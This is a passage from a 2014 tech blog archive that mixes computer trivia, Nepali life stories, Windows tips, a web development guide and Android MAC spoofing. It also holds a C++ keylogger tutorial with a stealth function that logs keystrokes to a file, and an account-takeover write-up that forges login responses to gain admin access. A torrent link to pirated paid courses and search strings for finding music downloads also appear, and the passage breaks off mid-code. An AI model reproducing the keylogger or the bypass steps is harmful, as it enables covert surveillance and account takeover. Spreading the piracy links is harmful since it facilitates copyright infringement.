
Saturday, November 22, 2014

6 amazing things you didn’t know about your computer

It’s a ritual across the globe: somewhere between sticking the kettle on and complaining about last night’s match, you’ll probably hit the button on your ageing company PC and wait while it slowly thinks about turning on. Rather than take it for granted, though, it’s worth taking a couple of minutes to appreciate a few of the things your long-suffering machine does without you ever knowing.

1. Bits, Bytes, and Size

Next time you complain about the pitiful memory capacity of your old 8GB iPod Touch, it’s worth remembering what makes up eight whole gigabytes. Computer science grads will know that, in the binary convention, every gigabyte is 1024 megabytes, every megabyte 1024 kilobytes, and every kilobyte 1024 bytes (drive makers prefer round thousands, which is one reason your 8GB shows up as a little less). Breaking it down to the lowest level, you’ve got 8 bits in a byte.
Why does that matter? Because on a flash drive each bit of data lives in a floating-gate transistor, a cell that traps a little charge on an insulated gate (or doesn’t) to record a ‘1’ or a ‘0’. (Want to be impressed even further? Getting the charge onto that gate relies on quantum tunnelling.) That means an 8GB iPod Touch, the one you were laughing at a minute ago for being puny, holds 8 × 1024³ × 8 = 68,719,476,736 bits, so on the order of 69 billion of those cells arrayed inside that svelte aluminium body (fewer if the chips store two bits per cell, as many now do). Mighty clever engineering indeed.

2. Everything you see or hear on the internet is actually on your computer

All your computer-whizz friends probably delight in telling you that having a ‘library’ of videos is so 2008, that no-one torrents any more, it’s all Netflix and iPlayer and ‘The Cloud’, whatever that means. But you might want to remind them: every time you stream a video or the week’s Top 40 off the web, it is technically playing from your computer. A streamed file is downloaded, piece by piece, into a buffer on your machine and played from there. Ever wondered what the white buffering bar on YouTube or Netflix means? It is the amount of video that has already been copied to the local cache, a.k.a. the amount you can still watch if your internet decides to up and die. (Whether that cached copy is easy to get at afterwards is another matter; streaming players go to some lengths to make sure it isn’t.)

3. The distance data travels

A quick experiment for you: click this link, which should take you to Wikipedia. With one click, you’ve just fetched a bunch of data from servers in Ashburn, Virginia, about 6000km from the UK. Your request has travelled from your computer, through a local Wi-Fi router or modem, to your ISP, from there onwards (under the Atlantic Ocean, if you’re in the UK) all the way to Virginia, and back again, in around a tenth of a second, depending on how good your internet connection is.
By comparison, it takes your body around 0.15 of a second to send a signal from your fingers up your spinal cord to the brain and back down again.

4. Counting Starts at Zero

At a base level, every computer’s just a really big, complicated calculator. But thanks to the way its intrinsic circuitry works – with lots of little logic gates that are either ‘on’ or ‘off’ – every action that takes place at a base level is happening in binary, where things are either a 1 or a 0, with no shades of grey in between.
This translates up to a neat bit of programming trivia: in most programming languages, counting (array indexing, at least) starts at zero, not one. Fortran, Lua and MATLAB, and classic Visual Basic with Option Base 1, are the usual counter-examples.
It actually makes a lot more sense. Ever thought about why the 20th century refers to the 1900s? It’s because when the dating system was settled on there was no year zero, so the very first century runs from AD 1 to AD 100, and nobody was clever enough to call it the 0th century. If they had, we’d probably have far fewer confused school children the world over.

5. The work that goes into a Ctrl+C, Ctrl+V

One rather under-appreciated fact about solid state drives (SSDs), regarded as the gold standard for fast, reliable storage, is the amount of copying they have to do. When you want to move some data from one place to another on the drive, it’s not just a matter of shuffling the bytes across.
Because of the way NAND flash works, over-writing a block of old data with some shiny new data isn’t as simple as writing the new stuff in with a bigger, thicker Sharpie. Flash can be written a page at a time but only erased a whole block at a time, so the drive has to do some complicated shuffling around.
In practice, this can mean that changing a tiny 4KB file can require the drive to read a whole 2MB block (hundreds of times more data than the 4KB you’re trying to write), hold it temporarily, erase the block, then write it all back with your change in. The ratio of bytes physically written to bytes you asked to write is called write amplification, and keeping it down is most of what an SSD’s controller spends its time on. It’s rather labour-intensive, so think before you juggle your files around next time.

6. Code isn’t as clean as you think

The majority of us put faith in bits of technology we don’t quite understand, be it committing your life to a 747 or your dirty pics to Snapchat’s auto-delete. When you do, you generally assume that the code’s been scrupulously examined by teams of caffeine-fuelled programmers, with most of the niggling little bugs found and nixed.
The truth seems to be quite the opposite. One Quora user pointed out that buried within the source code that ships with Java, one of the platforms a good chunk of the internet runs on, is this gem:
/**
* This method returns the Nth bit that is set in the bit array. The
* current position is cached in the following 4 variables and will
* help speed up a sequence of next() call in an index iterator. This
* method is a mess, but it is fast and it works, so don’t f*ck with it.
*/
private int _pos = Integer.MAX_VALUE;

It just goes to show that even programmers rush things to get home for the next installment of Game of Thrones sometimes.

Thursday, November 20, 2014

Life Story: Dolma Lama: From Daughter to Mother



Dolma Lama is a well-known television artist of Nepal, who also played the role of Phurwa’s mother in the first episode of Katha Mitho Sarangiko. In her real life Dolma has faced lots of ups and downs as a struggling woman. Born in a remote village of Helambu in the northern mountain region of the country, her life story can be an inspiration to many people. Dolma gave an interview for the KMS magazine program Sarangiko Bhalakusari. Here are some excerpts from the interview, in her own words:
“I am going to tell the truth about my real life. At a very early age I came to Kathmandu from my village to work as a labourer in a carpet factory. While I was weaving carpets in the factory, people told me that I could never make money with such a job. They suggested I go to India to find some work. The Jammu and Kashmir region was very popular among migrant workers at that time. At the age of 15, I went to Jammu to work as a road construction labourer. While I was there, I found a guy. I liked him. He proposed marriage. He said that if I did not marry him he would leave me and go to another place. He was helping me to find work there. I was so afraid of losing my job if he left me. I was very young at that time. I did not know right from wrong. So at that early age I got married to that guy, fearing I would lose the job if I did not marry.
MARRYING YOUNG

But after the marriage I started realizing that marriage needs a lot of understanding between a boy and a girl. I started regretting getting married in a hurry. My husband was quite a lot older than me. There was a lack of understanding as well. Still, I loved him. We did well for a few years. But we were very poor. Because of poverty there would be misunderstandings and quarrels about small things. He used to get angry over small things and often beat me. I stayed with him until I was 29. But everything has its limit. I could not tolerate the violence and harassment anymore. Then I decided to leave him. I told him that we could not go on living like this. We agreed that we could live apart. Then we left each other in a kind of understanding.
MY CHILDHOOD
I was really happy to be a part of the drama. Though I have acted in many video programs in the past, this was a new experience for me. I was born in Helambu. My childhood was spent in a typical farming village. I used to work hard on the farm, going to the forest to collect grass and firewood, carrying heavy loads of water and crops. The role I played in the drama reminded me of my childhood and my mother.
DAUGHTERS AND MOTHERS

In the drama I support my daughter against my husband. In real life too there is the same kind of situation. Fathers are always sceptical about the behaviour of their daughters. They are more worried about daughters. But there are many things daughters and mothers have in common. Daughters are closer to their mothers. They share more with their mothers than with their fathers. They are afraid of their fathers and so do not communicate well.
In the drama Phurwa decides for herself whom she marries. The first thing to remember is that people in the village are not educated. They don’t have schools in the village. They don’t know many things about people and places. Parents force their daughters to get married with somebody they like. But girls and boys do not know each other in such cases and their married life can be difficult.
PREPARING FOR MARRIAGE
I am in favour of love marriages, because boys and girls get a chance to understand each other and are then capable of deciding their own fate. In the drama Phurwa gets married to Harke, but later their marriage fails. Phurwa only saw Harke from the outside. She should have looked inside his heart and mind as well. It is very necessary before marriage for a boy and girl to spend a couple of months together to understand each other. It is not a good idea to get married just because of infatuation. The culture of getting married to a Lahure (somebody who has returned from military service abroad) is widespread in rural communities. People think that a Lahure is rich and can make girls happy.
THE FUTURE
Now I have three daughters and a son. I am worried about their future. I am giving a lot of time to my children for their education and future planning. Besides the family, I do other things like acting and singing to earn money. At the moment I am preparing to release a music album. I have already sung on nearly a dozen music albums.
I am really happy to be in this program to share some of my experience and feelings. I am also thankful to all the audience who are listening to me.”

Life Story: My ‘Grandma’ the Witch


I have a very vivid memory from my childhood of an old woman who used to live in my village, Bauka Jhoda, near Itahari. I used to call her ‘grandma’. She was around 60 years old. She lived with her husband and children. Villagers accused her of being a witch. If somebody became ill, the shaman would single her out and blame her, saying she drank blood. She was a poor Dalit and had no way of defending herself. My parents warned me against her, but I was always at her house; as far as I was concerned she was an innocent grandma who loved me a lot. We used to take the cows up to graze together. I used to play with her son. I couldn’t help wondering why the villagers accused her of being a witch.
She had a little land and a hut to live in. But because of the campaign of hatred waged against her by the people in the village, she could not stay there. So she planned to sell her property and move to another place. The problem was that everybody was ready to buy her property, but nobody was ready to sell land to her. Basically, they didn’t want to take the risk, as they saw it, of doing business with a woman who was known as a witch.
She went to different villages trying to buy some land but they accused her of being a witch and refused to sell to her. It was heart breaking for her – always having to move on.
Finally, she was able to buy a small piece of land in another village. But that land, although it was on the bank of a river, was useless and barren.
Today she must be in her 70s. Villagers still call her a witch. I last saw her a year ago. I’ve tried over the years to convince people that she is a harmless old woman. Nobody wants to talk to her, and she is still afraid of going to other people’s houses for fear of being abused. Now she is waiting for death to take her away, weighed down by years of abuse, but retaining her dignity.
I salute you grandma and bow my head in front of your patience. But I can never forgive myself for not being with you now to defend you. I am very sorry!
Meghraj Rasaili
BBC World Service Trust, Nepal
Producer- Sajha Sawal

Source: http://bbcnepalidrama.com/main/node/18

Tuesday, November 18, 2014

100 Useful RUN Commands for Windows

1. Windows Version - winver
2. Windows System Security Tool - syskey (removed from Windows 10 version 1709 onwards)
3. Windows Firewall - firewall.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd (Windows XP only)
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc

What is Web Development ?

We are completely surrounded by the internet, and so by websites, which are where we go to get information from it. The main reason the Internet was created was to share information around the world in an easy way, so websites were created to hold that information, and we visit them to get at it. But how and where do websites come from? That is where Web Development comes in: the process of creating or developing websites is called Web Development.

As the number of internet users grew, new needs appeared and people started wanting more than just information from the Internet.
Social networking is a huge part of the web: among the top 10 websites ranked by visitors, 3 or 4 are social networking sites (Facebook, Twitter, Yahoo and so on).
Even in the web application sector, most of the top 10 are social apps (Facebook, Twitter, WhatsApp, Tango, Skype and the rest; I could keep listing them all day).
Back to our agenda: Web Development is the process of creating or developing a website.

Is Web Development a Good Path for Future ?

This is a good question for a newbie, or for someone interested in Web Development who hasn't started yet.
To be honest, I will say yes. New companies are established every day and every one of them will need a website to announce its existence on the web, which is now the most visited place there is; we search the web for how to tie shoelaces and for how to start a company alike. Our searches can be for trivial needs as well as serious ones, so if you have a company you need a website, and to get a website you usually need a web developer, and not only a developer but someone to maintain it too.
It is a popular field now, many people are setting out to become good web developers, and the ones who are good earn a fair amount of money. Following is a chart of the annual salary of web developers across the world.




Is it hard to be a Web Developer ?

Nothing is easy to obtain, but compared with other fields in Computer Science, Web Development is easier to understand. There is a list of languages you must learn, but most of them are easy to pick up. When you start, everything will seem complicated and hard, but within a few days it will become clear.


How should I start ?

That's the most common question from beginners in any field, and one of the hardest to answer, but in Web Development there are a few principles you can follow. Every website needs web pages; a web page first needs some content typed into it, then it needs to be designed (font colour, background image and so on), then you make it interactive, then you can make it a dynamic page using a server-side language, and if you want you can add a database. Each of those steps requires you to learn a language to accomplish it.
Here is the Basic Concept



Task to accomplish                Language required
Create a webpage with contents    HTML
Design the webpage                CSS
Interactive webpage               JavaScript, jQuery
Dynamic website                   PHP
Database                          MySQL

These aren't the only languages available in Web Development, but they are the ones you must know and the most popular web development languages out there.

It seems really hard to get the hang of all these languages, but trust me, they are easy to learn and you don't need to master all of them. You must know them, but you can stick to the basics of CSS, JavaScript and jQuery, for example, and leave mastering those to the web designers.

Where should I Start from ?

You can start by learning in the following flow respectively 
  • HTML/CSS
  • JavaScript (Basics)
  • jQuery (Basics)
  • PHP
  • MySql




Language                          Level          Duration (average)
HTML + CSS                        Easy           2 weeks
JavaScript (Basics)               Intermediate   1 month
jQuery                            Intermediate   3 weeks
PHP + MySQL (Basics)              Intermediate   1 month 15 days
PHP + MySQL (Beyond the Basics)   Intermediate   1 month 15 days

    

Best Courses for Beginner's :

Lynda.com is one of the best sources for beginners to start learning from, but it's really expensive. No worries: I will give you the torrent link for those courses so you can start learning now :)

Following are the Courses you MUST Take


Lynda.com - Web Technology Fundamentals

Lynda.com - HTML and HTML5 Basics

Lynda.com - JavaScript for Web Designers

Lynda.com - jQuery Essential Training

Lynda.com - PHP with MySQL Essential Training

Lynda.com - PHP with MySQL Beyond the Basic


Download all the courses for free with the torrent link:

http://www.toofile.com/fod09epfs2kn/torrent-link.tar.gz.html

How to Spoof MAC Address on Android Phones

A Media Access Control address (MAC address) is a 12-hex-digit (48-bit) identifier assigned to a piece of network hardware such as the Wi-Fi adapter in your phone. In simple words, a MAC address can be used to uniquely identify your Android phone on the local network it is connected to. It never travels beyond that local network segment, so it does not identify you on the wider Internet.

Spoofing MAC Address on Android Devices

Even though the MAC address is burned into the hardware during manufacture, the address the driver actually uses can still be changed to one of your choice. Here are detailed instructions on how to spoof the MAC address on your Android phone.
Before you spoof the MAC address, record the original/current MAC address of your device, which you can do as follows:
  • On the Home Screen of your phone, tap the Menu button and go to Settings.
  • Tap About Device and go to Status.
  • Now scroll down to record the 12-character code shown under Wi-Fi MAC address. An address would read something like:
    Example MAC address: E5:12:D8:E5:69:97

Requirements for Spoofing the MAC Address

  1. Rooted Android Phone
  2. BusyBox app installed on your phone
  3. Once BusyBox is installed, you need to install Terminal app
Once the above requirements are satisfied, follow the instructions below to spoof your MAC address:

  1. Open the Terminal app and type the commands listed below. On most phones the Wi-Fi interface is wlan0, not eth0; if in doubt, run busybox ip link with no interface name and pick the interface carrying the address you noted above:
    su [HIT ENTER]
    busybox ip link show wlan0 [HIT ENTER]
    (This will show your current MAC address, just for your confirmation.)


  2. Now, type the following commands. Many drivers refuse to change the address while the interface is up, so take it down first and bring it back up afterwards:
    busybox ifconfig wlan0 down [HIT ENTER]
    busybox ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX [HIT ENTER]
    busybox ifconfig wlan0 up [HIT ENTER]
    (In the middle command, replace XX:XX:XX:XX:XX:XX with your new MAC address. Pick a unicast address: the first octet must be even, and by convention the 0x02 bit of the first octet is set to mark the address as locally administered rather than vendor-assigned.)


  3. You have now spoofed your MAC address successfully. To check for the change enter the following command again:
    busybox ip link show wlan0 [HIT ENTER]
    (Now you should see your new MAC address. The change lasts until the Wi-Fi driver is reloaded or the phone reboots, and it is only visible to devices on your local network.)
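The address you pick matters more than the steps above let on. The value the post uses as an illustration, E5:12:D8:E5:69:97, has an odd first octet, which makes it an IEEE 802 group (multicast) address rather than a station address, and the Linux kernel's generic Ethernet address-setting code rejects such addresses. The Python below is an added example, not code from the original post or from BusyBox: it parses the current address out of ip link output, checks that a candidate address is a genuine unicast address, generates a random locally-administered one (or one under a chosen vendor prefix), and assembles the BusyBox commands from the steps above, refusing bad input before anything would run as root. The sample ip link output, the interface name wlan0 and all function names are constructed for this example.

```python
import re
import secrets
from typing import List, Optional

# Constructed sample of what `busybox ip link show wlan0` prints on a rooted phone
# (output format and values assumed for this example).
SAMPLE_IP_LINK = (
    "3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000\n"
    "    link/ether 02:1a:2b:3c:4d:5e brd ff:ff:ff:ff:ff:ff\n"
)

MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$")


def parse_current_mac(ip_link_output: str) -> Optional[str]:
    """Extract the station address from `ip link show <iface>` output."""
    m = re.search(r"link/ether\s+([0-9a-fA-F:]{17})", ip_link_output)
    return m.group(1).lower() if m else None


def _octets(mac: str) -> List[int]:
    mac = mac.lower()
    if not MAC_RE.match(mac):
        raise ValueError(f"not a colon-separated 48-bit MAC: {mac!r}")
    return [int(x, 16) for x in mac.split(":")]


def is_valid_unicast_mac(mac: str) -> bool:
    """Six hex octets, I/G bit clear (not multicast), not all-zero, not broadcast."""
    try:
        o = _octets(mac)
    except ValueError:
        return False
    if o[0] & 0x01:  # least significant bit of the first octet is the I/G (group) bit
        return False
    return not (all(b == 0 for b in o) or all(b == 0xFF for b in o))


def is_locally_administered(mac: str) -> bool:
    """The U/L bit (0x02 in the first octet) marks an address as not vendor-assigned."""
    return bool(_octets(mac)[0] & 0x02)


def random_spoof_mac(oui: Optional[str] = None) -> str:
    """Random spoof address: locally administered and unicast by default, or
    under a given vendor prefix such as "00:1a:2b" to mimic that vendor."""
    if oui is None:
        b = list(secrets.token_bytes(6))
        b[0] = (b[0] | 0x02) & 0xFE  # set U/L, clear I/G
    else:
        b = _octets(oui + ":00:00:00")[:3] + list(secrets.token_bytes(3))
    return ":".join(f"{x:02x}" for x in b)


def build_spoof_commands(iface: str, new_mac: str) -> List[str]:
    """BusyBox commands for the change, validated before anything runs as root.
    The interface goes down first because many drivers refuse a change while it is up."""
    if not re.fullmatch(r"[a-z0-9]+", iface):
        raise ValueError(f"suspicious interface name: {iface!r}")
    if not is_valid_unicast_mac(new_mac):
        raise ValueError(f"refusing non-unicast or malformed MAC {new_mac!r}")
    return [
        f"busybox ifconfig {iface} down",
        f"busybox ifconfig {iface} hw ether {new_mac.lower()}",
        f"busybox ifconfig {iface} up",
        f"busybox ip link show {iface}",
    ]


if __name__ == "__main__":
    print("current:", parse_current_mac(SAMPLE_IP_LINK))
    print("post's example E5:12:D8:E5:69:97 is valid unicast?",
          is_valid_unicast_mac("E5:12:D8:E5:69:97"))
    mac = random_spoof_mac()
    print("generated:", mac, "locally administered:", is_locally_administered(mac))
    print("\n".join(build_spoof_commands("wlan0", mac)))
```

The command list is returned rather than executed so you can review it before pasting it into the Terminal app as root; the validation is the part worth keeping, since a multicast or malformed address fails silently on some drivers and leaves you with a dead interface on others.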
I hope you like this post.

15 Cool Internet and Computer Tricks


1. A shortcut to www. and .com.
Anything you type in the URL bar of your browser can be wrapped in www. and .com by pressing CTRL + Enter.
2. How to find music downloads easily?

In Google search bar, type the following strings:
-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) "metallica"
Replace “metallica” with whatever you are searching for. The search string can be used to find music downloads available on public FTP and HTTP sites.
Alternatively, you can also use the search string below.
intitle:index.of?mp3 metallica
3. How to skip intros of most videos on Youtube?
There is a YouTube feature called the “Wadsworth constant” that skips the first 30% of a video. To use it, add &wadsworth=1 to the end of the YouTube URL; it skips the first 30% of the video, which usually covers the boring introduction.
4. How to go directly to the Task Manager?
Instead of the usual CTRL + ALT + Delete for Windows, you can press CTRL + Shift + Esc to go directly to the Task Manager.
5. How to access StickyKeys in Windows?
StickyKeys can help users who have difficulty in holding down two or more keys at a time. It allows you to press just one key at a time instead of pressing them at the same time. To access it, press Shift key 5 times. Your computer will make a cute noise, then you can enable the Sticky Keys.
6. How to re-enable browser’s right click when web pages turn it off?
Some sites disable the right-click menu, usually to discourage people from saving their pictures. An easy way to re-enable it is to run the command below from the URL bar of your browser (most browsers now strip the javascript: prefix when it is pasted, so you may have to type that part by hand):
javascript:void(document.oncontextmenu=null)
7. A shortcut in opening a new tab.
You can click a link with the mouse scroll wheel button to open a new tab. You can also use CTRL + left click on the link.
8. How to open the last tab you closed?
You can press CTRL + Shift + T to open the last tab you closed. This works perfectly if you have accidentally closed a browser tab.
9. More uses of CTRL (Control) Key.
Holding CTRL makes the text cursor move by whole words instead of single characters:
CTRL + Backspace deletes the previous word.
CTRL + Left/Right arrow jumps to the start of the previous/next word.
CTRL + Home and CTRL + End move the cursor to the beginning and end of the document, respectively.
In browsers, CTRL + W closes the current tab and CTRL + number (1 to 8) goes to that tab; CTRL + 9 goes to the last tab.
10. Fast way of clearing cache and refreshing page.
You can press CTRL + Shift + R to clear cache and then refresh web page.
11. How to access Google with no country redirect?
As you have noticed, when you enter google.com in your browser, you are directed to the local version of Google. To use Google without the redirect, you can type in www.google.com/ncr.
12. How to watch age restricted Youtube videos without logging in?
If you encounter an age restricted video on Youtube, it is possible to still watch it by just removing the “watch?” in the URL.
13. Are there any Google Easter eggs?
Go to Google then search for “do a barrel roll”, Google will then do a barrel roll.
Go to Google then search for “zerg rush”, a bunch of animated zergs will appear and attack the web page.
Go to Google then search for “tilt”, Google will tilt.
Go to Google, then type in “atari breakout”, then go to Images. You can play a hidden game in Google images.
14. You can watch an ASCII animation of Star Wars in a telnet session.
On Windows Vista, Windows 7 and Windows 8 the Telnet client is not installed by default; turn it on under “Turn Windows features on or off” first. Then open Command Prompt (or type “cmd” in Run), type telnet and press Enter. Type “o” without the quotes and press Enter, then type towel.blinkenlights.nl and press Enter.
On Linux, Mac OS X and Windows XP, just open a terminal (Command Prompt on XP) and type “telnet towel.blinkenlights.nl” without the quotes.
15. Easy and fast way of tracking your UPS package.
You can search Google for your UPS tracking number, and it will link you to the tracking page for your package.

How To Make A Basic Keylogger in C++

First we need to create a new project.
Click on 'File' > 'New' > 'Project'.
Now choose 'Win32 Console Application' and name it "Keylogger".


If you get the 'Win32 Application Wizard', click on 'Next', then select 'Empty project' under 'Additional options' and click on 'Finish'.

You should have an empty project now.
Now we will add a .cpp file.

Right click on 'Source Files' and take 'Add' > 'New Item'.


Now take 'C++ File(.cpp)' and name it Keylogger.

then click 'Add'.

Now open Keylogger.cpp and Write this in it:

Code:
#include <iostream>   // These we need to
using namespace std;  // include to get our
#include <windows.h>  // keylogger working (GetAsyncKeyState lives here).
#include <winuser.h>  //

Now write this:
Code:
int Save (int key_stroke, const char *file); // Declare Save (const, because we pass it a string literal).
void Stealth(); // Declare Stealth.

Now we need to make a main function.(The main function will be the first that will be executed.)

Code:
int main()
{
    Stealth(); // This will call the Stealth function we will write later.
    int i;     // Here we declare 'i'. It is an int rather than a char: the key codes we scan go up to 190, which does not fit in a signed char, so a char counter would never finish the loop.

    while (1)  // Here we say 'while (1)' execute the code. But 1 is always 1 so it will always execute.
    {          // Note this is also the part that will increase your CPU usage.
        for (i = 8; i <= 190; i++)   // Virtual-key codes from VK_BACK (8) to VK_OEM_PERIOD (190).
        {
            if (GetAsyncKeyState(i) == -32767)   // -32767 is 0x8001: the key is down and was pressed since the last call.
                Save(i, "LOG.txt");   // This will send the value of 'i' and "LOG.txt" to our Save function we will write later. (The reason we declared it at the start of the program is that otherwise main would sit above Save and the compiler would not recognise it. Same with the Stealth function.)
        }
    }
    system("PAUSE"); // Here we say that the system has to wait before exiting. (With the loop above it is never actually reached.)
    return 0;
}

Why You Should Study to Be a Hacker

Before I begin, I want to re-emphasize to all of you that hacking is an elite profession. Hackers are among the top of the heap in the IT industry. Before you ever begin studying hacking, you should ideally have a firm grasp of computer operations, Linux, networking, coding and hopefully, a bit of operating system and application architecture. One doesn't begin hacking without a strong background in these other IT skills. If you do, you will likely give up frustrated. Hacking takes years of study and practice to become proficient, and if you try to take shortcuts you will likely fail, or worse, spend a few years in "Club Fed".
The hacker's skills are increasingly sought after in many corners of our profession. Here are just a few.

Penetration Testing

Penetration testing is essentially legal hacking. Organizations hire penetration testers to test the security of their information systems. These penetration testers use all the skills of a hacker to try to "penetrate" or hack these systems. In this way, the company can find the weaknesses in their systems before the malicious hackers do. There is a tremendous shortage of skilled penetration testers and the pay is VERY good.

Security Industry

The information technology security industry continues to expand rapidly as more and more commerce goes to the web and more and more security incursions take place. Information security has become big business and it cannot get enough well-trained people. A hacker is highly regarded in this industry, as ONLY the hacker understands the true vulnerabilities of information systems. The better one understands the weaknesses of these complex systems, the better one can defend them. So many IT security professionals have never hacked a system and as a result really have no idea how to protect one. Some of the highest paid individuals in this industry are former hackers.

Private Investigator

Increasingly, private investigators are employing hackers to gather information and evidence in their investigations. Although, at times, this may straddle the lines between legal and illegal hacking, it is important to note that this is sometimes the only way to gather evidence on many a critical case. In most cases, hackers are used by private investigators as contractors to insulate themselves from possible liability. This can be a lucrative employment, but also very risky.

Forensic Investigator

Forensic investigators are employed by law enforcement, the incident response teams of major companies and information security firms. Who better to trace the tracks of a hacker than someone who knows how to hack?
Learning to hack gives the forensic investigator the mindset of the intruder, as well as an understanding of what happened and what clues, evidence or artifacts must have been left behind after a cyber attack or other criminal activity.

Cyber Espionage

Spy agencies around the world are employing and looking for more and more hackers to spy on their adversaries. In the U.S., the CIA, the NSA, the FBI and numerous other three letter acronyms are using hacking techniques to foil terrorist attacks, spy on the foreign adversaries and keep track of their own citizens.

Cyber Warfare

In the digital era, warfare is rapidly evolving from being primarily one of guns, tanks, missiles and bullets to cyber warfare. There is a constant undertone of cyber warfare going on every day between adversaries around the world. Whether it be the rebels in Indonesia fighting their oppressive government, the Arab Spring, India v Pakistan, or Russia v Ukraine, all of these conflicts involve an element of cyber warfare. Not only is cyber warfare used to spy on the adversary, but often it is used to disable critical infrastructure. If I can disrupt the critical supply lines of my adversary, I can make it very hard for them to fight if food, water and ammunition supplies are disrupted digitally. In addition, disruption of such domestic services as electricity, water, water treatment and communication to my adversaries' citizens is only going to weaken and dispirit them.
Probably the most sophisticated cyber warfare attack to date was the release of the Stuxnet worm, widely attributed to the U.S. (together with Israel). This advanced worm burrowed into the Iranian uranium enrichment facility at Natanz to disrupt its ability to enrich uranium for the country's nuclear ambitions.
Just last month, August 2014, major banks in the U.S., including J.P. Morgan Chase, were hit by a cyber attack attributed at the time to Russia. It was believed that the attack was a response to the banks cooperating with U.S. sanctions on Russia over the invasion of Ukraine. This is simply an indication of how the game of international politics is played in 2014: with cyber attacks, a.k.a. hacking.

Authoritarian Government Resistance

Of the millions of people who read Null Byte, many of you are living in countries with authoritarian and abusive governments. Many of these governments will try to limit the use of the Internet to limit free speech and expression, while others will use the Internet as a means of repression. In these cases, having the skills to resist such abuse can be critical to you and your people's freedom.

Network or System Administrator

As a hacker, you need to understand how digital systems work and interoperate. That understanding is often far beyond what is necessary to be a network or system administrator. These IT personnel are often only taught to "click here, then click here and then click here..." without a full understanding of the system and functionality they are working with. The hacker is often much better equipped to run these systems because they understand how the systems work and interact, what their weaknesses are, etc.

A Way to Gain Super Admin & Admin Privileges By Bypassing Authentication


While researching and working on bug bounties in late January 2013, I found a way to bypass authentication that lets an attacker take over any user account on the website, including gaining Super Admin and Admin privileges, if the site is vulnerable to this type of attack.

Using this vulnerability the attacker can bypass the authentication-bypass countermeasure and predict the login validation and access control processes for any victim's account by combining a simple technique; in this way he can also bypass authentication for all accounts regardless of their passwords and successfully compromise the victim's account, since the login validation process is predictable by the attacker.

I tried various techniques to bypass the login, such as arbitrary method usage and anonymous method usage, but all of them failed. There was also a countermeasure: if we modified the response and then sent that modified response code as a request to the server, the server did not respond to the modified request but dropped it instead. So the challenge was to bypass this countermeasure, understand the login validation process and find a weakness in it. Below I describe how I was able to bypass this countermeasure and the authentication.

Please Note: there is a precondition that the attacker must know the victim's login ID or user ID and must lock the victim's account.


During testing we found that an attacker can bypass authentication of Super Admin, Admin and Normal (read-only privileged) users by locking the victim's account and modifying the response JSON message.


Steps to Execute the Attack:

1. Go to the application login page and lock the victim's account with 3 wrong password attempts.

2. Now enter the normal (test) user's username with any random value as the password.

3. Intercept the login request and forward it; the original response will now be intercepted, as shown below:


Original Response:

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 88
Date: Wed, 16 Jan 2013 10:05:20 GMT

OK[10,0,0,0,0,["site.com","You Account has been Locked, Please contact Administrator."]]

4. Now modify the original response as shown below, but don't modify the status code 200 OK or any headers, and forward it; the attacker now successfully logs into the normal user's (victim's) account.


Modified Response to Bypass Authentication of Normal User:

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 44
Date: Wed, 16 Jan 2013 10:09:10 GMT

OK[10,0,0,0,0,["site.com,"N","Normal User"]]

Note: "10" denotes normal user and "N" denotes read only privilege.
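As an added example (not from the write-up), the following Python models the two sides of the issue: a client that decides from the OK[...] reply body alone, and a server that keeps privilege and lock state behind a session token and re-checks both on every request. The account, password and session scheme are assumptions; the reply format, the three-attempt lockout and the "N" flag follow the text above.

```python
import json
import re
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Constructed sample bodies in the "OK[...]" reply format shown in the steps above.
LOCKED_BODY = ('OK[10,0,0,0,0,["site.com",'
               '"You Account has been Locked, Please contact Administrator."]]')
FORGED_BODY = 'OK[10,0,0,0,0,["site.com","N","Normal User"]]'


def parse_login_response(body: str) -> dict:
    """Decode an 'OK[...]' login reply.  Following the note above, the leading 10 is
    the user type; a three-element trailer is (site, privilege flag, label) and a
    two-element trailer is (site, error message) such as the lockout notice."""
    m = re.fullmatch(r"OK(\[.*\])", body.strip())
    if not m:
        raise ValueError("not an OK[...] reply")
    fields = json.loads(m.group(1))
    trailer = fields[-1]
    if len(trailer) == 3:
        return {"ok": True, "user_type": fields[0],
                "privilege": trailer[1], "label": trailer[2]}
    return {"ok": False, "user_type": fields[0], "message": trailer[1]}


def vulnerable_client_decision(body: str) -> Optional[str]:
    """The weak pattern: the client grants access from the reply body alone, so a
    proxy that swaps LOCKED_BODY for FORGED_BODY obtains the "N" privilege."""
    info = parse_login_response(body)
    return info["privilege"] if info["ok"] else None


@dataclass
class Account:
    password: str          # plaintext only in this toy; real systems store a hash
    privilege: str         # "N" = read-only, as the note above describes
    failed_logins: int = 0


LOCK_THRESHOLD = 3         # the three-wrong-attempt lockout used in step 1


class Server:
    """Hardened pattern: privilege and lock state live only on the server and are
    re-checked on every request through an unguessable session token (assumed design)."""

    def __init__(self, accounts: Dict[str, Account]) -> None:
        self.accounts = accounts
        self.sessions: Dict[str, str] = {}      # token -> username

    def login(self, username: str, password: str) -> Tuple[str, Optional[str]]:
        acct = self.accounts.get(username)
        if acct is None or acct.failed_logins >= LOCK_THRESHOLD:
            return LOCKED_BODY, None            # same body for unknown and locked users
        if password != acct.password:
            acct.failed_logins += 1
            if acct.failed_logins >= LOCK_THRESHOLD:
                return LOCKED_BODY, None
            return 'OK[10,0,0,0,0,["site.com","Invalid credentials"]]', None
        acct.failed_logins = 0
        token = secrets.token_hex(16)
        self.sessions[token] = username
        body = 'OK[10,0,0,0,0,["site.com",%s,"Normal User"]]' % json.dumps(acct.privilege)
        return body, token

    def authorize(self, token: Optional[str], needed: str) -> bool:
        """Ignore whatever reply the client claims to have received; consult state."""
        username = self.sessions.get(token or "")
        if username is None:
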